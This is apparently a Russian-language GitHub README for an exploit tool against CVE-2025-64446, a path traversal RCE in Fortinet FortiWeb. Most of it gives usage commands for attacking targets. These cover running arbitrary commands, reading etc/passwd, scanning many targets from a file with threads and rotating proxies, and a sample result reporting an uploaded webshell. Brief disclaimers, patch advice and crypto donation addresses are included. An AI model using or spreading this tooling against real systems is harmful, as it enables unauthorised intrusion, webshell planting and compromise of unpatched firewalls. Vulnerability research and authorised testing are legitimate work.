
Инструмент для исследования безопасности для обнаружения и тестирования CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)
Инструмент для исследования безопасности, предназначенный для обнаружения и тестирования уязвимости CVE-2025-64446 в брандмауэре веб-приложений Fortinet FortiWeb (WAF). Эта критическая уязвимость нулевого дня, связанная с обходом пути, активно эксплуатируется в реальных условиях и позволяет неаутентифицированным злоумышленникам обходить средства защиты и выполнять произвольный код.
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
CVE-2025-64446 — это критическая уязвимость нулевого дня, связанная с обходом пути в Fortinet FortiWeb WAF, которая активно эксплуатируется в реальных условиях. Эта уязвимость позволяет неаутентифицированным злоумышленникам обходить средства защиты с помощью атак обхода пути, что может привести к удаленному выполнению кода, доступу к конфигурационным файлам и полной компрометации системы.
Оценка CVSS: 9.8 (Критическая)
Статус: Активно эксплуатируется в реальных условиях
CISA KEV: Добавлен в каталог известных эксплуатируемых уязвимостей
Патч: FG-IR-25-910
Затронутый продукт: Fortinet FortiWeb WAF
# Клонируйте репозиторий
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Установите зависимости
pip install -r requirements.txt
# Сделайте скрипты исполняемыми (опционально)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Загрузите скрипты
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Установите зависимости
pip install requests
# Одна цель
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Выполнение пользовательской команды
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Несколько целей из файла
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# С многопоточностью для более быстрого сканирования
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Подробный вывод для отладки
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Один прокси
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Несколько прокси из файла
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Базовый POC-тест
python3 cve_2025_64446_poc.py -u http://target.com
# Тестирование конкретного файла
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Подробный вывод
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url Целевой URL
-f, --file Файл, содержащий целевые URL (по одному на строку)
-c, --command Команда для выполнения (по умолчанию: id)
-t, --threads Количество потоков (по умолчанию: 1)
-o, --output Выходной файл (по умолчанию: uknf_fortiweb_results.json)
-v, --verbose Включить подробное логирование
--proxy URL прокси (например, http://127.0.0.1:8080)
--proxy-list Файл, содержащий URL прокси (по одному на строку)
Скрипт генерирует JSON-файл с подробными результатами:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
Если вы используете FortiWeb WAF:
Немедленно установите обновления безопасности:
# Проверьте текущую версию
show system status
# Обновитесь до последней версии
execute upgrade <firmware-file>
Сегментация сети:
Усиление конфигурации:
Требования CISA:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Создайте файл с целями
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Запустите сканирование
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Один прокси
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Несколько прокси из файла
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Базовый POC
python3 cve_2025_64446_poc.py -u https://example.com
# Тестирование конкретного файла
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd
Приветствуются любые вклады! Пожалуйста, не стесняйтесь отправлять Pull Request.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Если вы столкнулись с какими-либо проблемами или у вас есть предложения, пожалуйста, откройте issue на GitHub.
Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.
Если вы считаете этот инструмент полезным, пожалуйста, поставьте ему звезду на GitHub!
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этой программой. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем.
Если вы нашли этот инструмент полезным и хотели бы поддержать проект:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Спасибо за вашу поддержку! 🙏